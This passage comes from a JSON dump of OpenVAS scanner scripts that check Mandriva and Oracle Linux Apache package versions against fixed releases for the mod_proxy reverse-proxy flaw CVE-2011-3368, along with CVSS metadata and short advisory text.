((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-24T12:55:21", "description": "Check for the Version of apache", "cvss3": {}, "published": "2011-10-10T00:00:00", "type": "openvas", "title": "Mandriva Update for apache MDVSA-2011:144 (apache)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:831460", "href": "http://plugins.openvas.org/nasl.php?oid=831460", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apache MDVSA-2011:144 (apache)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been discovered and corrected in apache:\n\n The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\n interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern\n matches for configuration of a reverse proxy, which allows remote\n attackers to send requests to intranet servers via a malformed URI\n containing an initial \\@ (at sign) character (CVE-2011-3368).\n \n Packages for 2009.0 are provided as of the Extended Maintenance\n Program. Please visit this link to learn more:\n http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\n \n The updated packages have been patched to correct this issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"apache on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-10/msg00017.php\");\n script_id(831460);\n script_version(\"$Revision: 6570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-10 16:05:48 +0200 (Mon, 10 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"MDVSA\", value: \"2011:144\");\n 
script_cve_id(\"CVE-2011-3368\");\n script_name(\"Mandriva Update for apache MDVSA-2011:144 (apache)\");\n\n script_summary(\"Check for the Version of apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_scgi\", rpm:\"apache-mod_proxy_scgi~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = isrpmvuln(pkg:\"apache-mod_reqtimeout\", rpm:\"apache-mod_reqtimeout~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n 
exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:36:35", "description": "Oracle Linux Local Security Checks ELSA-2011-1392", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2011-1392", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122067", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122067", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-1392.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122067\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:12:31 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-1392\");\n script_tag(name:\"insight\", value:\"ELSA-2011-1392 - httpd security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-1392\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-1392.html\");\n script_cve_id(\"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.0.2.el5_7.3\", 
rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.0.2.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.0.2.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.0.2.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-02T21:13:39", "description": "Apache HTTP Server is prone to an information disclosure\nvulnerability.\n\nAn attacker can exploit this vulnerability to gain access to sensitive\ninformation.", "cvss3": {}, "published": "2011-10-11T00:00:00", "type": "openvas", "title": "Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3368"], "modified": "2017-02-25T00:00:00", "id": "OPENVAS:103293", "href": "http://plugins.openvas.org/nasl.php?oid=103293", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_49957.nasl 5424 2017-02-25 16:52:36Z teissa $\n#\n# Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the 
implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Apache HTTP Server is prone to an information disclosure\nvulnerability.\n\nAn attacker can exploit this vulnerability to gain access to sensitive\ninformation.\";\n\ntag_solution = \"The vendor released an update. Please see the references for details.\";\n\nif (description)\n{\n script_id(103293);\n script_tag(name:\"creation_date\", value:\"2011-10-11 17:46:33 +0200 (Tue, 11 Oct 2011)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $\");\n script_bugtraq_id(49957,50802);\n script_cve_id(\"CVE-2011-3368\",\"CVE-2011-4317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version (\"$Revision: 